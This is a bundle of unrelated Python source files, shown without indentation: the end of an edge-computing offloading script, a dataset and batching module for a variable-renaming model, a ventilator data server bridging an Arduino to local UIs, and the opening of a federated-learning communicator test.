cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
break
logger.info('algo stopped!')
def run_me(hosts_, mec_no_, cloud_ip_, send_path, broker_ip_): # call this from agent
global discovering
global hosts
global mec_no
global host_ip
global cloud_ip
global my_algo
global broker_ip
logger.info(f'mec ip: {ip_address()}')
my_algo = psutil.Process()
discovering_group()
offloading_group()
host_ip_set()
hosts = hosts_
mec_no = mec_no_
cloud_ip = cloud_ip_
broker_ip = broker_ip_
host_ip = ip_address()
logger.info(f'MEC Details: {hosts}')
discovering = 1
time.sleep(2)
for host in hosts:
if hosts[host] != host_ip:
mec_rtt[hosts[host]] = []
start_loop()
logger.info('saving data')
save_and_send(send_path)
logger.info('send alert to control')
time.sleep(r.uniform(1, 10))
_client.publish('control/control', pickle.dumps(['stop', ip_address()]))
logger.info('Terminating process')
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
def main():
# (hosts_, mec_no_, cloud_ip_, send_path, broker_ip_) , (--hosts, --mec_no_, --cloud_ip, --s_path, --b_ip)
parser = argparse.ArgumentParser()
parser.add_argument('--hosts', type=str, help="{hostname: 'ip address', ...} of all mec")
    parser.add_argument('--mec_no', type=int, default=1, help='Number of MEC nodes')
parser.add_argument('--cloud_ip', type=str, help="cloud ip address")
parser.add_argument('--s_path', type=str, default='/home/mec/result/python', help='Path to send result to')
parser.add_argument('--b_ip', type=str, help='Broker ip address')
args = parser.parse_args()
# h_hosts = ast.literal_eval(args.hosts)
l_host, l_len = args.hosts.split('_'), len(args.hosts.split('_'))
h_hosts = dict(zip(l_host[:l_len//2], l_host[l_len//2:]))
f_name = os.path.basename(__file__).split('/')[-1].split('.')[0]
tim = dt.datetime.now().strftime("%a_%H%M")
name = f'logs/{f_name}_{tim}_{args.mec_no}'
file_handler = logging.FileHandler(name)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
logger.info('Process Started')
run_me(hosts_=h_hosts, mec_no_=args.mec_no, cloud_ip_=args.cloud_ip, send_path=args.s_path, broker_ip_=args.b_ip)
if __name__ == '__main__':
main()
|
dataset.py
|
import glob
import pickle
import sys
import os
import gc
import time
import ujson as json
import tarfile
from typing import Iterable, List, Dict, Union, Tuple
import multiprocessing
import threading
import queue
from tqdm import tqdm
import numpy as np
from utils import nn_util
from utils.ast import AbstractSyntaxTree, SyntaxNode
from utils.code_processing import annotate_type
from utils.graph import PackedGraph
from utils.vocab import VocabEntry, SAME_VARIABLE_TOKEN, Vocab
import sentencepiece as spm
import random
import torch
import torch.multiprocessing as torch_mp
batcher_sync_msg = None
torch.multiprocessing.set_sharing_strategy('file_system')
import resource
rlimit = resource.getrlimit(resource.RLIMIT_NOFILE)
resource.setrlimit(resource.RLIMIT_NOFILE, (4096, rlimit[1]))
class Example(object):
def __init__(self, ast: AbstractSyntaxTree, variable_name_map: dict, **kwargs):
self.ast = ast
self.variable_name_map = variable_name_map
for key, val in kwargs.items():
setattr(self, key, val)
@classmethod
def from_json_dict(cls, json_dict, **kwargs):
tree = AbstractSyntaxTree.from_json_dict(json_dict)
variable_name_map = dict()
for var_name, var_nodes in tree.variables.items():
variable_name_map[var_name] = var_nodes[0].new_name
if 'test_meta' in json_dict:
kwargs['test_meta'] = json_dict['test_meta']
return cls(tree, variable_name_map, **kwargs)
class Batch(object):
__slots__ = ('examples', 'tensor_dict')
def __init__(self, examples, tensor_dict):
self.examples = examples
self.tensor_dict = tensor_dict
@property
def size(self):
return self.tensor_dict['batch_size']
class Batcher(object):
def __init__(self, config, train=True):
self.config = config
self.train = train
# model specific config
self.is_ensemble = config['encoder']['type'] == 'EnsembleModel'
if not self.is_ensemble:
self.vocab = Vocab.load(config['data']['vocab_file'])
self.grammar = self.vocab.grammar
self.use_seq_encoder = config['encoder']['type'] == 'SequentialEncoder' or config['encoder']['type'] == 'XfmrSequentialEncoder'
self.use_hybrid_encoder = config['encoder']['type'] == 'HybridEncoder'
self.init_gnn_with_seq_encoding = config['encoder']['type'] == 'GraphASTEncoder' and config['encoder']['init_with_seq_encoding']
@property
def annotate_sequential_input(self):
return self.use_seq_encoder or self.use_hybrid_encoder or self.init_gnn_with_seq_encoding
def annotate_example(self, example) -> Example:
"""annotate examples by populating specific fields, useful for sorting examples or batching"""
# for ensemble models, it will be annotated by the batcher for each specific class
if self.is_ensemble:
return example
if self.annotate_sequential_input:
src_bpe_model = self.vocab.source_tokens.subtoken_model
snippet = example.code_tokens
# np.random.shuffle(snippet)
snippet = ' '.join(snippet)
sub_tokens = ['<s>'] + src_bpe_model.encode_as_pieces(snippet)[:510] + ['</s>']
sub_token_ids = [src_bpe_model.bos_id()] + src_bpe_model.encode_as_ids(snippet)[:510] + [src_bpe_model.eos_id()]
setattr(example, 'sub_tokens', sub_tokens)
setattr(example, 'sub_token_ids', sub_token_ids)
setattr(example, 'source_seq_length', len(sub_tokens))
tgt_bpe_model = self.vocab.target.subtoken_model
eov_id = tgt_bpe_model.eos_id()
variable_name_subtoken_map = dict()
tgt_pred_seq_len = 0
for old_name, new_name in example.variable_name_map.items():
if old_name == new_name:
subtoken_ids = [self.vocab.target[SAME_VARIABLE_TOKEN], eov_id]
else:
subtoken_ids = tgt_bpe_model.encode_as_ids(new_name) + [eov_id]
variable_name_subtoken_map[old_name] = subtoken_ids
tgt_pred_seq_len += len(subtoken_ids)
setattr(example, 'variable_name_subtoken_map', variable_name_subtoken_map)
setattr(example, 'target_prediction_seq_length', tgt_pred_seq_len)
return example
def sort_training_examples(self, examples):
def _key(_example):
if self.use_seq_encoder:
return _example.source_seq_length
elif self.is_ensemble:
return len(_example.ast.code)
else:
return _example.target_prediction_seq_length
examples.sort(key=_key)
return examples
def get_batch_size(self, examples: List[Example]):
if self.is_ensemble:
return len(examples)
if self.annotate_sequential_input:
return len(examples) * max(e.source_seq_length for e in examples)
else:
return len(examples) * max(e.target_prediction_seq_length for e in examples)
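    # Note (added for clarity): the "batch size" computed here is a padded-token
    # budget rather than an example count: ensemble models just count examples,
    # sequential inputs use len(examples) * longest source sequence, and all other
    # encoders use len(examples) * longest target prediction sequence, so the
    # caller's batch_size bound roughly caps the volume of the padded tensors.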
def to_tensor_dict(self, examples: List[Example], return_prediction_target=True) -> Dict[str, torch.Tensor]:
from model.sequential_encoder import SequentialEncoder
from model.xfmr_sequential_encoder import XfmrSequentialEncoder
from model.graph_encoder import GraphASTEncoder
if not hasattr(examples[0], 'target_prediction_seq_length'):
for example in examples:
self.annotate_example(example)
if self.config['encoder']['type'] == 'GraphASTEncoder':
init_with_seq_encoding = self.config['encoder']['init_with_seq_encoding']
packed_graph, tensor_dict = GraphASTEncoder.to_packed_graph([e.ast for e in examples],
connections=self.config['encoder']['connections'],
init_with_seq_encoding=init_with_seq_encoding)
if init_with_seq_encoding:
seq_tensor_dict = SequentialEncoder.to_tensor_dict(examples)
tensor_dict['seq_encoder_input'] = seq_tensor_dict
_tensors = GraphASTEncoder.to_tensor_dict(packed_graph,
self.grammar, self.vocab)
tensor_dict.update(_tensors)
elif self.config['encoder']['type'] == 'SequentialEncoder':
tensor_dict = SequentialEncoder.to_tensor_dict(examples)
elif self.config['encoder']['type'] == 'XfmrSequentialEncoder':
tensor_dict = XfmrSequentialEncoder.to_tensor_dict(examples)
elif self.config['encoder']['type'] == 'HybridEncoder':
packed_graph, gnn_tensor_dict = GraphASTEncoder.to_packed_graph([e.ast for e in examples],
connections=self.config['encoder']['graph_encoder']['connections'])
gnn_tensors = GraphASTEncoder.to_tensor_dict(packed_graph, self.grammar, self.vocab)
gnn_tensor_dict.update(gnn_tensors)
seq_tensor_dict = SequentialEncoder.to_tensor_dict(examples)
tensor_dict = {'graph_encoder_input': gnn_tensor_dict,
'seq_encoder_input': seq_tensor_dict}
else:
raise ValueError('UnknownEncoderType')
if self.train or return_prediction_target:
prediction_target = self.to_batched_prediction_target(examples)
tensor_dict['prediction_target'] = prediction_target
if not self.train:
if hasattr(examples[0], 'test_meta'):
tensor_dict['test_meta'] = [e.test_meta for e in examples]
tensor_dict['batch_size'] = len(examples)
num_elements = nn_util.get_tensor_dict_size(tensor_dict)
tensor_dict['num_elements'] = num_elements
return tensor_dict
def to_batch(self, examples: List[Example], return_examples=False, return_prediction_target=True) -> Batch:
if self.is_ensemble:
# do not perform tensorization for the parent ensemble model
tensor_dict = None
else:
with torch.no_grad():
tensor_dict = self.to_tensor_dict(examples, return_prediction_target)
if not return_examples:
batch = Batch(None, tensor_dict)
del examples[:]
else:
batch = Batch(examples, tensor_dict)
return batch
def to_batched_prediction_target(self, examples: List[Example]):
batch_size = len(examples)
unchanged_var_weight = self.config['train']['unchanged_variable_weight']
use_bpe_for_var_name = self.vocab.target.subtoken_model is not None
variable_name_subtoken_maps = []
if use_bpe_for_var_name:
# eov_id = self.vocab.target.subtoken_model.eos_id()
# for var_name_map in variable_name_maps:
# var_name_subtoken_map = dict()
# for old_name, new_name in var_name_map.items():
# if old_name == new_name:
# subtoken_ids = [self.vocab.target[SAME_VARIABLE_TOKEN], eov_id]
# else:
# subtoken_ids = self.vocab.target.subtoken_model.encode_as_ids(new_name) + [eov_id]
# var_name_subtoken_map[old_name] = subtoken_ids
variable_name_subtoken_maps = [e.variable_name_subtoken_map for e in examples]
else:
for example in examples:
var_name_map = example.variable_name_map
var_name_subtoken_map = dict()
for old_name, new_name in var_name_map.items():
if old_name == new_name:
subtoken_ids = [self.vocab.target[SAME_VARIABLE_TOKEN]]
else:
subtoken_ids = [self.vocab.target[new_name]]
var_name_subtoken_map[old_name] = subtoken_ids
variable_name_subtoken_maps.append(var_name_subtoken_map)
max_pred_timestep = max(sum(len(val) for val in x.values()) for x in variable_name_subtoken_maps)
target_variable_encoding_indices = torch.zeros(batch_size, max_pred_timestep, dtype=torch.long)
target_variable_encoding_indices_mask = torch.zeros(batch_size, max_pred_timestep)
variable_tgt_name_id = torch.zeros(batch_size, max_pred_timestep, dtype=torch.long)
variable_tgt_name_weight = torch.zeros(batch_size, max_pred_timestep)
var_with_new_name_mask = torch.zeros(batch_size, max_pred_timestep)
auxiliary_var_mask = torch.zeros(batch_size, max_pred_timestep)
variable_master_node_ptr = 0
for e_id, example in enumerate(examples):
ast = example.ast
var_name_map = example.variable_name_map
_var_node_ids = []
_tgt_name_ids = []
variable_ptr = 0
for var_id, var_name in enumerate(ast.variables):
new_var_name_subtoken_ids = variable_name_subtoken_maps[e_id][var_name]
variable_end_ptr = variable_ptr + len(new_var_name_subtoken_ids)
variable_tgt_name_id[e_id, variable_ptr: variable_end_ptr] = torch.tensor(new_var_name_subtoken_ids, dtype=torch.long)
if var_name == var_name_map[var_name]:
auxiliary_var_mask[e_id, variable_ptr: variable_end_ptr] = 1.
variable_tgt_name_weight[e_id, variable_ptr: variable_end_ptr] = unchanged_var_weight
else:
var_with_new_name_mask[e_id, variable_ptr: variable_end_ptr] = 1.
variable_tgt_name_weight[e_id, variable_ptr: variable_end_ptr] = 1.
target_variable_encoding_indices[e_id, variable_ptr: variable_end_ptr] = var_id # variable_master_node_ptr
variable_master_node_ptr += 1
variable_ptr = variable_end_ptr
target_variable_encoding_indices_mask[e_id, :variable_ptr] = 1.
return dict(variable_tgt_name_id=variable_tgt_name_id,
variable_tgt_name_weight=variable_tgt_name_weight,
var_with_new_name_mask=var_with_new_name_mask,
auxiliary_var_mask=auxiliary_var_mask,
target_variable_encoding_indices=target_variable_encoding_indices,
target_variable_encoding_indices_mask=target_variable_encoding_indices_mask)
def get_json_iterator_from_tar_file(file_paths, shuffle=False, progress=False, group_by=None, buffer=True) -> Iterable:
assert group_by in (None, 'binary_file')
# if shuffle:
# assert buffer is False
if isinstance(file_paths, str):
file_paths = [file_paths]
if shuffle:
np.random.shuffle(file_paths)
for file_path in file_paths:
payloads = []
t1 = time.time()
with tarfile.open(file_path, 'r') as f:
files = [x.name for x in f.getmembers() if x.name.endswith('.jsonl')]
# if shuffle:
# np.random.shuffle(files)
if progress: file_iter = tqdm(files, file=sys.stdout)
else: file_iter = files
for filename in file_iter:
jsonl_file = f.extractfile(filename)
if jsonl_file is not None:
if group_by is None:
for line_no, tree_encoding_line in enumerate(jsonl_file):
# if tree_encoding_line.decode().startswith('{'):
# tree_json_dict = json.loads(tree_encoding_line)
payload = tree_encoding_line, dict(file_name=filename, line_num=line_no)
if buffer:
payloads.append(payload)
else:
yield payload
elif group_by == 'binary_file':
lines = [(l.decode().strip(), dict(file_name=filename, line_num=line_no))
for line_no, l in enumerate(jsonl_file)]
yield lines
if shuffle:
np.random.shuffle(payloads)
print(f'load shard {file_path} took {time.time() - t1:.4f}s', file=sys.stderr)
for payload in payloads:
yield payload
def json_line_reader(file_path, queue, worker_num, shuffle, progress, group_by=None, buffer=True):
for json_str in get_json_iterator_from_tar_file(file_path, shuffle, progress, group_by=group_by, buffer=buffer):
queue.put(json_str)
for i in range(worker_num):
queue.put(None)
def is_valid_training_example(example):
if hasattr(example, 'target_prediction_seq_length'):
if example.target_prediction_seq_length >= 200: return False
return example.ast.size < 300 and \
len(example.variable_name_map) > 0 #and \
# any(k != v for k, v in example.variable_name_map.items())
def example_generator(json_queue, example_queue, consumer_num=1):
while True:
payload = json_queue.get()
if payload is None: break
json_str, meta = payload
tree_json_dict = json.loads(json_str)
if 'code_tokens' in tree_json_dict:
example = Example.from_json_dict(tree_json_dict, binary_file=meta, code_tokens=tree_json_dict['code_tokens'])
else:
example = Example.from_json_dict(tree_json_dict, binary_file=meta)
example_queue.put(example)
for i in range(consumer_num):
example_queue.put(None)
# print('[Example Generator] example generator process quit!')
def example_to_batch(json_queue, batched_examples_queue, batch_size, train, config, worker_manager_lock, return_examples=False, return_prediction_target=True):
batcher = Batcher(config, train)
buffer_size = config['train']['buffer_size']
buffer = []
print(f'[ExampleToBatch] pid={os.getpid()}', file=sys.stderr)
def _generate_batches():
# buffer.sort(key=batcher.train_example_sort_key)
batcher.sort_training_examples(buffer)
batches = []
batch_examples = []
for example in buffer:
batch_size_with_example = batcher.get_batch_size(batch_examples + [example])
if batch_examples and batch_size_with_example > batch_size:
batches.append(batch_examples)
batch_examples = []
batch_examples.append(example)
if batch_examples:
batches.append(batch_examples)
if train:
random.shuffle(batches)
for batch_examples in batches:
batch = batcher.to_batch(batch_examples, return_examples=return_examples, return_prediction_target=return_prediction_target)
# while batched_examples_queue.qsize() > 100:
# time.sleep(10)
# print(batch.tensor_dict['num_elements'])
while worker_manager_lock.value == 1:
time.sleep(0.2)
batched_examples_queue.put(batch)
# print(f'[ExampleToBatch] batched examples queue size {batched_examples_queue.qsize()}', file=sys.stderr)
buffer.clear()
gc.collect()
finished = False
while True:
t1 = time.time()
while len(buffer) < buffer_size:
payload = json_queue.get()
if payload is None:
finished = True
break
json_str, meta = payload
tree_json_dict = json.loads(json_str)
if 'code_tokens' in tree_json_dict:
example = Example.from_json_dict(tree_json_dict, binary_file=meta,
code_tokens=tree_json_dict['code_tokens'])
else:
example = Example.from_json_dict(tree_json_dict, binary_file=meta)
batcher.annotate_example(example)
if train:
if is_valid_training_example(example):
buffer.append(example)
else:
buffer.append(example)
# print(f'[ExampleToBatch] {time.time() - t1}s took for loading {buffer_size} examples to buffer', file=sys.stderr)
_generate_batches()
# print(f'[ExampleToBatch] {time.time() - t1}s took for batching', file=sys.stderr)
if finished:
break
batched_examples_queue.put(None)
while batcher_sync_msg.value == 0:
time.sleep(1)
print(f'[ExampleToBatch] quit', file=sys.stderr)
sys.stderr.flush()
def worker_manager(worker_result_queue, out_queue, num_workers, worker_manager_lock, buffer_size):
num_finished_workers = 0
patience = 0
prev_queue_size = -1
while True:
finished = False
# t0 = time.time()
try:
queue_size = worker_result_queue.qsize()
        except NotImplementedError:
            queue_size = 999999  # qsize() is not implemented on macOS; just trigger data loading
# print(f'[LocalWorkerManager] queue size={queue_size}, patience={patience}', file=sys.stderr)
if (queue_size > buffer_size or patience >= 10) and out_queue.qsize() < buffer_size:
worker_manager_lock.value = 1
patience = 0
# print(f'[LocalWorkerManager] start loading {queue_size} batches...', file=sys.stderr)
i = 0
while not worker_result_queue.empty() and i < buffer_size:
batch = worker_result_queue.get()
# print(f'[LocalWorkerManager] {time.time() - t0} took to load a batch, size={worker_result_queue.qsize()}', file=sys.stderr)
if batch is not None:
out_queue.put(batch)
else:
num_finished_workers += 1
if num_finished_workers == num_workers:
finished = True
break
i += 1
# print(f'[LocalWorkerManager] loaded {i} batches...', file=sys.stderr)
worker_manager_lock.value = 0
else:
if queue_size == prev_queue_size:
patience += 1
prev_queue_size = queue_size
time.sleep(0.2)
if finished: break
out_queue.put(None)
class Dataset(object):
def __init__(self, file_paths):
if isinstance(file_paths, list):
self.file_paths = file_paths
else:
assert isinstance(file_paths, str)
self.file_paths = glob.glob(file_paths)
print(f'reading data files {self.file_paths}', file=sys.stderr)
example_num = 0
for _ in get_json_iterator_from_tar_file(self.file_paths):
example_num += 1
self.size = example_num
def __len__(self):
return self.size
def __iter__(self):
return self.get_iterator(progress=True)
def get_single_process_iterator(self, shuffle=False, progress=False) -> Iterable[Example]:
json_str_iter = get_json_iterator_from_tar_file(self.file_paths, shuffle, progress)
for json_str, meta in json_str_iter:
tree_json_dict = json.loads(json_str)
example = Example.from_json_dict(tree_json_dict, binary_file=meta)
if example.ast.size != max(node.node_id for node in example.ast) + 1:
continue
yield example
def _get_iterator(self, shuffle=False, num_workers=1):
json_enc_queue = multiprocessing.Queue()
example_queue = multiprocessing.Queue(maxsize=5000)
json_loader = multiprocessing.Process(target=json_line_reader, args=(self.file_paths, json_enc_queue, num_workers,
shuffle, False, None, False))
json_loader.daemon = True
example_generators = []
for i in range(num_workers):
p = multiprocessing.Process(target=example_generator,
args=(json_enc_queue, example_queue, 1))
p.daemon = True
example_generators.append(p)
json_loader.start()
for p in example_generators: p.start()
num_finished_workers = 0
while True:
example = example_queue.get()
if example is not None:
yield example
else:
num_finished_workers += 1
if num_finished_workers == num_workers: break
json_loader.join()
for p in example_generators: p.join()
def get_iterator(self, shuffle=False, progress=True, num_workers=1):
if progress:
it_func = lambda x: tqdm(x, total=len(self), file=sys.stdout)
else:
it_func = lambda x: x
return it_func(self._get_iterator(shuffle, num_workers))
def batch_iterator(self, batch_size: int, config: Dict,
return_examples=False,
return_prediction_target=None,
num_readers=3,
num_batchers=3,
progress=True, train=False, single_batcher=False) -> Iterable[Union[Batch, Dict[str, torch.Tensor]]]:
if progress:
it_func = lambda x: tqdm(x, file=sys.stdout)
else:
it_func = lambda x: x
if single_batcher:
return it_func(self._single_process_batch_iter(batch_size, config, num_readers, train))
else:
return it_func(self._batch_iterator(batch_size, config, num_readers, num_batchers, train, return_examples, return_prediction_target))
def _batch_iterator(self, batch_size: int, config: Dict, num_readers, num_batchers, train=False, return_examples=False, return_prediction_target=None) -> Iterable[Batch]:
global batcher_sync_msg
batcher_sync_msg = multiprocessing.Value('i', 0)
json_enc_queue = multiprocessing.Queue(maxsize=10000)
worker_manager_lock = multiprocessing.Value('i', 0)
json_loader = multiprocessing.Process(target=json_line_reader,
args=(self.file_paths, json_enc_queue, num_readers,
train, False))
json_loader.daemon = True
example_generators = []
worker_result_queue = torch_mp.Queue(maxsize=150)
if return_prediction_target is None:
return_prediction_target = train
for i in range(num_readers):
p = multiprocessing.Process(target=example_to_batch,
args=(json_enc_queue, worker_result_queue, batch_size, train, config, worker_manager_lock, return_examples, return_prediction_target))
p.daemon = True
example_generators.append(p)
json_loader.start()
for p in example_generators: p.start()
batch_queue = queue.Queue(maxsize=100)
worker_manager_thread = threading.Thread(target=worker_manager, args=(worker_result_queue, batch_queue, num_readers, worker_manager_lock, 100))
worker_manager_thread.start()
while True:
# t1 = time.time()
main_process_queue_get_lock = 1
batch = batch_queue.get()
# print(f'[MainThread] local batch queue size {batch_queue.qsize()}', file=sys.stderr)
# print(f'{time.time() - t1} took to load a batch', file=sys.stderr)
if batch is None:
break
else:
yield batch
worker_result_queue.close()
# print('start joining...')
batcher_sync_msg.value = 1
json_loader.join()
# print('json_loader quitted')
for p in example_generators: p.join()
worker_manager_thread.join()
# print('example generators quitted')
# print('batchers quiteed')
sys.stdout.flush()
sys.stderr.flush()
def _single_process_batch_iter(self, batch_size: int, config: Dict, num_readers=2, shuffle=False) -> Iterable[Batch]:
batcher = Batcher(config)
example_iter = self.get_iterator(shuffle=shuffle, progress=False, num_workers=num_readers)
# t1 = time.time()
batch_examples = []
batch_node_num = 0
# if example.ast.size < 300 and len(example.variable_name_map) > 0:
        for example in filter(is_valid_training_example, example_iter):
batch_examples.append(example)
batch_node_num += example.ast.size
if batch_node_num >= batch_size:
batch = batcher.to_batch(batch_examples)
# print(f'[Dataset] {time.time() - t1} took to load a batch', file=sys.stderr)
yield batch
batch_examples = []
batch_node_num = 0
# t1 = time.time()
if batch_examples:
batch = batcher.to_batch(batch_examples)
yield batch
if __name__ == '__main__':
for _example in Dataset('data/0-trees.tar.gz'):
if _example.ast.size > 200:
print(_example.binary_file, _example.variable_name_map)
|
hevserver.py
|
#!/usr/bin/env python3
# data server to manage comms between UIs and LLI
#
# Author: Dónal Murray <donal.murray@cern.ch>
import asyncio
import json
import time
import threading
import argparse
import svpi
import hevfromtxt
import commsControl
from commsConstants import PAYLOAD_TYPE, CMD_TYPE, CMD_GENERAL, CMD_SET_TIMEOUT, CMD_SET_MODE, ALARM_CODES, CMD_MAP, CommandFormat
from collections import deque
from serial.tools import list_ports
from typing import List
import logging
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s - %(levelname)s - %(message)s')
class HEVPacketError(Exception):
pass
class HEVServer(object):
def __init__(self, lli):
self._alarms = []
self._values = None
self._dblock = threading.Lock() # make db threadsafe
self._lli = lli
self._lli.bind_to(self.polling)
self._broadcasting = True
self._datavalid = None # something has been received from arduino. placeholder for asyncio.Event()
self._dvlock = threading.Lock() # make datavalid threadsafe
self._dvlock.acquire() # come up locked to wait for loop
# start worker thread to send values in background
worker = threading.Thread(target=self.serve_all, daemon=True)
worker.start()
def __repr__(self):
with self._dblock:
return f"Alarms: {self._alarms}.\nSensor values: {self._values}"
def polling(self, payload):
# get values when we get a callback from commsControl (lli)
logging.debug(f"Payload received: {payload!r}")
# check if it is data or alarm
payload_type = payload.getType()
if payload_type == PAYLOAD_TYPE.ALARM:
# Alarm is latched until acknowledged in GUI
alarm_packet = payload.getDict()
alarmCode = alarm_packet["alarmCode"]
with self._dblock:
try:
alarm = ALARM_CODES(alarmCode).name
if alarm not in self._alarms:
self._alarms.append(alarm)
except ValueError as e:
# alarmCode does not exist in the enum, this is serious!
logging.error(e)
self._alarms.append("ARDUINO_FAIL") # assume Arduino is broken
# let broadcast thread know there is data to send
with self._dvlock:
self._datavalid.set()
elif payload_type == PAYLOAD_TYPE.DATA:
# pass data to db
with self._dblock:
self._values = payload.getDict()
# let broadcast thread know there is data to send
with self._dvlock:
self._datavalid.set()
elif payload_type == PAYLOAD_TYPE.CMD:
# ignore for the minute
pass
elif payload_type == PAYLOAD_TYPE.UNSET:
# ignore for the minute
pass
else:
# invalid packet, don't throw exception just log and pop
logging.error("Received invalid packet, ignoring")
# pop from lli queue
self._lli.pop_payloadrecv()
async def handle_request(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:
# listen for queries on the request socket
data = await reader.read(300)
request = json.loads(data.decode("utf-8"))
# logging
addr = writer.get_extra_info("peername")
logging.info(f"Answering request from {addr}")
try:
reqtype = request["type"]
if reqtype == "cmd":
reqcmd = request["cmd"]
if reqcmd == "CMD_START" or reqcmd == "CMD_STOP":
# temporary, since CMD_START and CMD_STOP are now deprecated
reqcmdtype = "GENERAL" # fake a general command
logging.warning("CMD_START AND CMD_STOP are deprecated and will be removed in a future release.")
reqcmd = reqcmd.split("_")[1]
else:
reqcmdtype = request["cmdtype"]
reqparam = request["param"] if request["param"] is not None else 0
command = CommandFormat(cmdType=CMD_TYPE[reqcmdtype].value,
cmdCode=CMD_MAP[reqcmdtype].value[reqcmd].value,
param=reqparam)
self._lli.writePayload(command)
# processed and sent to controller, send ack to GUI since it's in enum
payload = {"type": "ack"}
elif reqtype == "broadcast":
# ignore for the minute
pass
elif reqtype == "alarm":
# acknowledgement of alarm from gui
try:
# delete alarm if it exists
with self._dblock:
self._alarms.remove(request["ack"])
payload = {"type": "ack"}
                except (KeyError, ValueError) as e:  # remove() raises ValueError, a missing "ack" key raises KeyError
raise HEVPacketError(f"Alarm could not be removed. May have been removed already. {e}")
else:
raise HEVPacketError(f"Invalid request type")
packet = json.dumps(payload).encode()
# send reply and close connection
writer.write(packet)
await writer.drain()
writer.close()
except (NameError, KeyError, HEVPacketError) as e:
# invalid request: reject immediately
logging.warning(f"Invalid packet: {e}")
payload = {"type": "nack"}
packet = json.dumps(payload).encode()
writer.write(packet)
await writer.drain()
writer.close()
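    # Example request payloads (added; illustrative only -- the exact command and
    # alarm names depend on the CMD_MAP/CMD_TYPE/ALARM_CODES enums in
    # commsConstants):
    #   {"type": "cmd", "cmdtype": "GENERAL", "cmd": "START", "param": null}
    #   {"type": "alarm", "ack": "<name of a previously broadcast alarm>"}
    # Successful requests are answered with {"type": "ack"}, failures with
    # {"type": "nack"}.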
async def handle_broadcast(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:
# log address
addr = writer.get_extra_info("peername")
logging.info(f"Broadcasting to {addr!r}")
while self._broadcasting:
# wait for data from serial port
try:
# set timeout such that there is never pileup
await asyncio.wait_for(self._datavalid.wait(), timeout=0.05)
except asyncio.TimeoutError:
continue
# take lock of db and prepare packet
with self._dblock:
values: List[float] = self._values
alarms = self._alarms if len(self._alarms) > 0 else None
broadcast_packet = {}
broadcast_packet["sensors"] = values
broadcast_packet["alarms"] = alarms # add alarms key/value pair
logging.debug(f"Send: {json.dumps(broadcast_packet,indent=4)}")
try:
writer.write(json.dumps(broadcast_packet).encode())
await writer.drain()
except (ConnectionResetError, BrokenPipeError):
# Connection lost, stop trying to broadcast and free up socket
logging.warning(f"Connection lost with {addr!r}")
self._broadcasting = False
# take control of datavalid and reset it
with self._dvlock:
self._datavalid.clear()
self._broadcasting = True
writer.close()
async def serve_request(self, ip: str, port: int) -> None:
server = await asyncio.start_server(
self.handle_request, ip, port)
# get address for log
addr = server.sockets[0].getsockname()
logging.info(f"Listening for requests on {addr}")
async with server:
await server.serve_forever()
async def serve_broadcast(self, ip: str, port: int) -> None:
server = await asyncio.start_server(
self.handle_broadcast, ip, port)
# get address for log
addr = server.sockets[0].getsockname()
logging.info(f"Serving on {addr}")
async with server:
await server.serve_forever()
async def create_sockets(self) -> None:
self._datavalid = asyncio.Event() # initially false
self._dvlock.release()
LOCALHOST = "127.0.0.1"
b1 = self.serve_broadcast(LOCALHOST, 54320) # WebUI broadcast
r1 = self.serve_request(LOCALHOST, 54321) # joint request socket
b2 = self.serve_broadcast(LOCALHOST, 54322) # NativeUI broadcast
tasks = [b1, r1, b2]
#tasks = [b1, r1]
await asyncio.gather(*tasks, return_exceptions=True)
def serve_all(self) -> None:
asyncio.run(self.create_sockets())
if __name__ == "__main__":
#parser to allow us to pass arguments to hevserver
parser = argparse.ArgumentParser(description='Arguments to run hevserver')
parser.add_argument('--inputFile', type=str, default = '', help='a test file to load data')
args = parser.parse_args()
# check if input file was specified
if args.inputFile != '':
        if args.inputFile.endswith('.txt'):
# assume sample.txt format
lli = hevfromtxt.hevfromtxt(args.inputFile)
else:
# assume hex dump
lli = svpi.svpi(args.inputFile)
logging.info(f"Serving data from {args.inputFile}")
else:
# get arduino serial port
for port in list_ports.comports():
vidpid = ""
            if port.pid is not None and port.vid is not None:
                vidpid = f"{port.vid:04x}:{port.pid:04x}".upper()
logging.debug(vidpid)
if port.manufacturer and "ARDUINO" in port.manufacturer.upper():
port_device = port.device
elif vidpid == "10C4:EA60" :
port_device = port.device
# initialise low level interface
try:
lli = commsControl.commsControl(port=port_device)
logging.info(f"Serving data from device {port_device}")
except NameError:
logging.error("Arduino not connected")
exit(1)
hevsrv = HEVServer(lli)
# serve forever
loop = asyncio.get_event_loop()
try:
loop.run_forever()
finally:
loop.close()
|
test_communicator.py
|
# Copyright 2021 Fedlearn authors.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys, os
import socket
import threading
from dataclasses import dataclass
root_path = os.getcwd()
sys.path.append(root_path)
sys.path.append(os.path.join(root_path,'demos/HFL'))
import sys
from demos.HFL.communicator.base_communicator import BaseCommunicator
from core.entity.common.machineinfo import MachineInfo
from demos.HFL.common.hfl_message import HFL_MSG
from demos.HFL.basic_control_msg_type import HFL_Control_Massage_Type as HCT
from demos.HFL.common.msg_handler import Msg_Handler
import time
from multiprocessing import Process
from demos.HFL.communicator.com_builder import (
Communicator_Builder,
CommType
)
import unittest # The test framework
Condition = threading.Condition()
@dataclass
class Config:
ip:str
port:str
mode:str
class TestCommunicator(unittest.TestCase):
def test_grpc_communicator(self):
class Receiver(Msg_Handler):
def __init__(self,comm:BaseCommunicator):
self.comm = comm
            def handle_message(self, msg_type, msg_data: HFL_MSG):
                # echo the message back with sender and receiver swapped
                msg_data.sender, msg_data.receiver = msg_data.receiver, msg_data.sender
                self.comm.send_message(msg_data)
class Sender(Msg_Handler):
def __init__(self,comm:BaseCommunicator):
self.comm = comm
self.return_type = ''
def handle_message(self, msg_type, msg_data:HFL_MSG):
self.return_type = msg_data.get_type()
with Condition:
Condition.notify()
def get_return(self)->str:
with Condition:
Condition.wait()
return self.return_type
def send(self,msg_type_str):
